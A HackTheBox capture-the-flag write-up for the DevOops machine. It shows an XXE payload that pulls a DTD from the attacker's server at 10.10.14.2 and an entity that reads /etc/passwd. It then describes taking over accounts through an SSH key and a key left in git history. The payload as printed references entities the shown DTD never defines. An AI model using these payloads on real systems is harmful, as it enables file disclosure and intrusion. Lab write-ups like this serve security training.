Introduction
DevOops is a machine on the HackTheBox.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
This article will show how to hack DevOops box and get user.txt and root.txt.
Collection
First, we use NMAP to Scan the open ports and see if there any port is open.
Let’s open browser, and visit http://10.10.10.91:5000/ .
OK, it looks like a website. Let’s enumerate the website.
After enumeration, we found that there is a page that we can upload XML file.
Hack the DevOops Box
Get User.txt
I think that it has XXE issue. But, let’s submit a simple XML first.
<note> <Author>Tom</Author> <Subject>Computer</Subject> <Content>HowToBuyAMacComputer</Content> </note>
After we submitting this file, the website return a message.
Now, let’s submit our payload.
First, we create a new XML file:
<!--?xml version="1.0" ?--> <!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://10.10.14.2/1.dtd">%remote;%int;%trick;]> <note> <Author>&b;</Author> <Subject>Jani</Subject> <Content>Reminder</Content> </note>
Then, we create a DTD file on our Kali Linux, the content is:
<p class="p1"><!ENTITY b SYSTEM "file:///etc/passwd" ></p>
Then, we build a simple HTTP Server by using python.
Finally, it reads the /etc/passwd file.
Due to SSH is opened, I think that I can find ssh key under default folder.
Then, we got user.txt
Get Root.txt
We found that there is a “git” user. So, we try to login as git.
Then, we check the .bash_history file.
We found that git user initial a git repo. Let’s go to this folder and see what we can find.
We check the git log.
We found that this user add a key. Let’s check this commit.
Then, we use this key to login.
Summary
This box is not difficult, the difficulty should around 3. There are 2 challenges. First, create the XML payload. Second, Found that there is a git user account and it can be login. Once you found that git can be login, you will realise that there must be some information in the git log.
If you want to read more HackTheBox writeup, you can visit this link.